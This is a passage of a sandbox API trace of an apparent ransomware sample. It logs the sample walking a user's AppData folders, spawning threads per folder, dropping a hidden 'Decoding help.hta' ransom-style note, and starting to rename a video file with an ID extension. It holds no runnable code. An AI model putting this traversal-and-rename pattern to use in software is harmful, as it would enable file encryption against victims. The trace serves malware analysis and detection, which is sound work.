CloseHandle (hObject=0x824) returned 1 [0055.754] FindNextFileW (in: hFindFile=0x671430, lpFindFileData=0xc08fd30 | out: lpFindFileData=0xc08fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe80ff230, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xe80ff230, ftLastAccessTime.dwHighDateTime=0x1d2dda1, ftLastWriteTime.dwLowDateTime=0xe80ff230, ftLastWriteTime.dwHighDateTime=0x1d2dda1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Help", cAlternateFileName="MICROS~2")) returned 1 [0055.754] lstrcmpW (lpString1=".", lpString2="Microsoft Help") returned -1 [0055.754] lstrcmpW (lpString1="..", lpString2="Microsoft Help") returned -1 [0055.754] lstrcmpiW (lpString1="windows", lpString2="Microsoft Help") returned 1 [0055.757] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*" [0055.757] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*") returned 51 [0055.757] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\", lpString2="Microsoft Help" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Help") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Help" [0055.757] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Help", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Help\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Help\\*.*" [0055.757] GlobalMemoryStatus (in: lpBuffer=0xc08fd10 | out: lpBuffer=0xc08fd10) [0055.757] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2a9189a0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x824 [0055.770] CloseHandle (hObject=0x824) returned 1 [0055.770] FindNextFileW (in: hFindFile=0x671430, lpFindFileData=0xc08fd30 | out: lpFindFileData=0xc08fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb7314c10, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb7314c10, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Mozilla", cAlternateFileName="")) returned 1 [0055.770] lstrcmpW (lpString1=".", lpString2="Mozilla") returned -1 [0055.770] lstrcmpW (lpString1="..", lpString2="Mozilla") returned -1 [0055.771] lstrcmpiW (lpString1="windows", lpString2="Mozilla") returned 1 [0055.773] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*" [0055.773] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*") returned 51 [0055.773] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\", lpString2="Mozilla" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla" [0055.773] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\*.*" [0055.774] GlobalMemoryStatus (in: lpBuffer=0xc08fd10 | out: lpBuffer=0xc08fd10) [0055.774] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2a968ae0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x824 [0055.790] CloseHandle (hObject=0x824) returned 1 [0055.790] FindNextFileW (in: hFindFile=0x671430, lpFindFileData=0xc08fd30 | out: lpFindFileData=0xc08fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1b231e70, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x1b231e70, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0055.790] lstrcmpW (lpString1=".", lpString2="Temp") returned -1 [0055.790] lstrcmpW (lpString1="..", lpString2="Temp") returned -1 [0055.790] lstrcmpiW (lpString1="windows", lpString2="Temp") returned 1 [0055.793] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*" [0055.793] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*") returned 51 [0055.793] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\", lpString2="Temp" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp" [0055.793] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\*.*" [0055.793] GlobalMemoryStatus (in: lpBuffer=0xc08fd10 | out: lpBuffer=0xc08fd10) [0055.793] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2a9c8c80, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x824 [0055.803] CloseHandle (hObject=0x824) returned 1 [0055.803] FindNextFileW (in: hFindFile=0x671430, lpFindFileData=0xc08fd30 | out: lpFindFileData=0xc08fd30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29175f80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29175f80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29175f80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 1 [0055.803] lstrcmpW (lpString1=".", lpString2="Temporary Internet Files") returned -1 [0055.803] lstrcmpW (lpString1="..", lpString2="Temporary Internet Files") returned -1 [0055.803] lstrcmpiW (lpString1="windows", lpString2="Temporary Internet Files") returned 1 [0055.803] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*" [0055.803] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*") returned 51 [0055.803] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\", lpString2="Temporary Internet Files" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files" [0055.803] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\*.*" [0055.803] GlobalMemoryStatus (in: lpBuffer=0xc08fd10 | out: lpBuffer=0xc08fd10) [0055.804] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5f30ee8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x824 [0055.827] CloseHandle (hObject=0x824) returned 1 [0055.827] FindNextFileW (in: hFindFile=0x671430, lpFindFileData=0xc08fd30 | out: lpFindFileData=0xc08fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2ab32d60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2ab32d60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2ab32d60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VirtualStore", cAlternateFileName="VIRTUA~1")) returned 1 [0055.827] lstrcmpW (lpString1=".", lpString2="VirtualStore") returned -1 [0055.827] lstrcmpW (lpString1="..", lpString2="VirtualStore") returned -1 [0055.827] lstrcmpiW (lpString1="windows", lpString2="VirtualStore") returned 1 [0055.831] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*" [0055.831] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*") returned 51 [0055.831] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\", lpString2="VirtualStore" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\VirtualStore") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\VirtualStore" [0055.831] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\VirtualStore", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\VirtualStore\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\VirtualStore\\*.*" [0055.831] GlobalMemoryStatus (in: lpBuffer=0xc08fd10 | out: lpBuffer=0xc08fd10) [0055.831] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2aa18dc0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x824 [0055.839] CloseHandle (hObject=0x824) returned 1 [0055.839] FindNextFileW (in: hFindFile=0x671430, lpFindFileData=0xc08fd30 | out: lpFindFileData=0xc08fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2ab32d60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2ab32d60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2ab32d60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VirtualStore", cAlternateFileName="VIRTUA~1")) returned 0 [0055.839] FindClose (in: hFindFile=0x671430 | out: hFindFile=0x671430) returned 1 Thread: id = 313 os_tid = 0x210 [0042.509] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\*.*", lpFindFileData=0xc1cfd30 | out: lpFindFileData=0xc1cfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6714f0 [0042.509] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.509] FindNextFileW (in: hFindFile=0x6714f0, lpFindFileData=0xc1cfd30 | out: lpFindFileData=0xc1cfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.509] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.509] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.509] FindNextFileW (in: hFindFile=0x6714f0, lpFindFileData=0xc1cfd30 | out: lpFindFileData=0xc1cfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0042.509] lstrcmpW (lpString1=".", lpString2="Adobe") returned -1 [0042.509] lstrcmpW (lpString1="..", lpString2="Adobe") returned -1 [0042.509] lstrcmpiW (lpString1="windows", lpString2="Adobe") returned 1 [0042.637] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\*.*" [0042.637] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\*.*") returned 54 [0042.637] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\", lpString2="Adobe" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe" [0042.637] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\*.*" [0042.637] GlobalMemoryStatus (in: lpBuffer=0xc1cfd10 | out: lpBuffer=0xc1cfd10) [0042.637] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x11531390, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x658 [0042.652] CloseHandle (hObject=0x658) returned 1 [0042.652] FindNextFileW (in: hFindFile=0x6714f0, lpFindFileData=0xc1cfd30 | out: lpFindFileData=0xc1cfd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0042.652] lstrcmpW (lpString1=".", lpString2="Microsoft") returned -1 [0042.652] lstrcmpW (lpString1="..", lpString2="Microsoft") returned -1 [0042.652] lstrcmpiW (lpString1="windows", lpString2="Microsoft") returned 1 [0042.654] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\*.*" [0042.654] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\*.*") returned 54 [0042.654] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\", lpString2="Microsoft" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft" [0042.654] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\*.*" [0042.654] GlobalMemoryStatus (in: lpBuffer=0xc1cfd10 | out: lpBuffer=0xc1cfd10) [0042.654] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x11561460, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x658 [0042.671] CloseHandle (hObject=0x658) returned 1 [0042.671] FindNextFileW (in: hFindFile=0x6714f0, lpFindFileData=0xc1cfd30 | out: lpFindFileData=0xc1cfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 1 [0042.671] lstrcmpW (lpString1=".", lpString2="Sun") returned -1 [0042.671] lstrcmpW (lpString1="..", lpString2="Sun") returned -1 [0042.671] lstrcmpiW (lpString1="windows", lpString2="Sun") returned 1 [0042.674] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\*.*" [0042.674] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\*.*") returned 54 [0042.674] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\", lpString2="Sun" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun" [0042.674] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\*.*" [0042.674] GlobalMemoryStatus (in: lpBuffer=0xc1cfd10 | out: lpBuffer=0xc1cfd10) [0042.674] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x11591530, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x658 [0042.682] CloseHandle (hObject=0x658) returned 1 [0042.682] FindNextFileW (in: hFindFile=0x6714f0, lpFindFileData=0xc1cfd30 | out: lpFindFileData=0xc1cfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 0 [0042.682] FindClose (in: hFindFile=0x6714f0 | out: hFindFile=0x6714f0) returned 1 Thread: id = 314 os_tid = 0x314 [0042.510] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*.*", lpFindFileData=0x15c1fd30 | out: lpFindFileData=0x15c1fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1014db90, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x1014db90, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671570 [0042.510] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.510] FindNextFileW (in: hFindFile=0x671570, lpFindFileData=0x15c1fd30 | out: lpFindFileData=0x15c1fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1014db90, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x1014db90, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.510] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.510] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.510] FindNextFileW (in: hFindFile=0x671570, lpFindFileData=0x15c1fd30 | out: lpFindFileData=0x15c1fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf46c040, ftCreationTime.dwHighDateTime=0x1d4c608, ftLastAccessTime.dwLowDateTime=0xf2ae4330, ftLastAccessTime.dwHighDateTime=0x1d4c9b4, ftLastWriteTime.dwLowDateTime=0xf2ae4330, ftLastWriteTime.dwHighDateTime=0x1d4c9b4, nFileSizeHigh=0x0, nFileSizeLow=0x9deb, dwReserved0=0x0, dwReserved1=0x0, cFileName="5_ZUjzjcPnH3.mp4", cAlternateFileName="5_ZUJZ~1.MP4")) returned 1 [0042.661] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*.*" [0042.661] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*.*") returned 53 [0042.661] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Decoding help.hta" [0042.661] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\decoding help.hta")) returned 0xffffffff [0042.661] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6e0 [0042.661] WriteFile (in: hFile=0x6e0, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x15c1fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x15c1fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0042.662] CloseHandle (hObject=0x6e0) returned 1 [0042.662] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0042.663] lstrcmpiW (lpString1="Decoding help.hta", lpString2="5_ZUjzjcPnH3.mp4") returned 1 [0042.663] lstrlenW (lpString="5_ZUjzjcPnH3.mp4") returned 16 [0042.663] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*.*" [0042.663] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*.*") returned 53 [0042.663] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="5_ZUjzjcPnH3.mp4" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\5_ZUjzjcPnH3.mp4") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\5_ZUjzjcPnH3.mp4" [0042.663] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\5_ZUjzjcPnH3.mp4" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\5_ZUjzjcPnH3.mp4") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\5_ZUjzjcPnH3.mp4" [0042.663] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\5_ZUjzjcPnH3.mp4", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS 